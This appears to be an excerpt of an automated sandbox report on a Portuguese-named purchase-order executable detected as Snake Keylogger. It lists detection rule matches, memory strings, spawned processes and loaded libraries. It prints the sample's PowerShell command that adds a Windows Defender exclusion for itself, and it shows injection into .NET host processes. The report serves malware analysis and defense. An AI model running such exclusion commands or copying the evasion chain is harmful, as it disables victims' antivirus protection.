              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7A8485_2_06A7A848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A711A05_2_06A711A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A781A85_2_06A781A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A711915_2_06A71191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7819A5_2_06A7819A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A755E85_2_06A755E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A785F15_2_06A785F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A755DA5_2_06A755DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A70D385_2_06A70D38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A7C1785_2_06A7C178
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A77D405_2_06A77D40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A70D485_2_06A70D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_06A77D505_2_06A77D50
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120
              Source: ORDEM DE COMPRA.exeStatic PE information: No import functions for PE file found
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEhetayeyunuzuzazeped@ vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000000.2059230100.000001FBD7AAE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUnoqunomJ vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182716686.000001FBD9680000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEhetayeyunuzuzazeped@ vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000000.2059218760.000001FBD7AA2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182682413.000001FBD95B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exeBinary or memory string: OriginalFilenameNativeMethods.dll" vs ORDEM DE COMPRA.exe
              Source: ORDEM DE COMPRA.exeBinary or memory string: OriginalFilenameUnoqunomJ vs ORDEM DE COMPRA.exe
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: ORDEM DE COMPRA.exe, ---.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, --J.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, --J.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, --J.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, --J.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, O-.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@11/10@4/2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1756
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo3x5km0.qeo.ps1Jump to behavior
              Source: ORDEM DE COMPRA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: ORDEM DE COMPRA.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: AddInProcess32.exe, 00000005.00000002.4523823205.0000000003350000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003344000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4527017564.000000000413B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000331C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000330E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: ORDEM DE COMPRA.exeVirustotal: Detection: 25%
              Source: ORDEM DE COMPRA.exeReversingLabs: Detection: 21%
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeFile read: C:\Users\user\Desktop\ORDEM DE COMPRA.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\ORDEM DE COMPRA.exe "C:\Users\user\Desktop\ORDEM DE COMPRA.exe"
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -ForceJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
